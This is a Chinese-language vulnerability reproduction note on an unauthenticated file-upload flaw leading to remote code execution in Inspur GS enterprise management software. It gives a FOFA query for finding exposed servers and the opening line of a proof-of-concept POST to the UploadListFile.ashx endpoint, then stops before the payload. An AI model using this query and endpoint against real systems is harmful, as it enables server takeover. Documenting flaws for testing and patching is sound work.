浪潮GS企业管理软件 UploadListFile 文件上传致RCE漏洞复现

0x01 产品简介

浪潮GS企业管理软件产品是一款面向大中型集团企业的全面解决方案，它基于Microsoft.NET技术路线和SOA（面向服务的架构）,采用SOA架构和先进开放的GSP应用中间件开发，支持Web服务和Xml进行远程通信及数据交换。旨在帮助大中型集团企业实现资源整合、流程优化和智能决策，提升管理水平和竞争力。

0x02 漏洞概述

浪潮GS企业管理软件 UploadListFile接口存在任意文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。

0x03 复现环境

FOFA：

body="/cwbase/web/scripts/jquery.js" || icon_hash="-1341069524"

0x04 漏洞复现 

PoC

POST /cwbase/EP/ListContent/UploadListFile.ashx?uptype=attslib&keyid=1&key1=1&key2=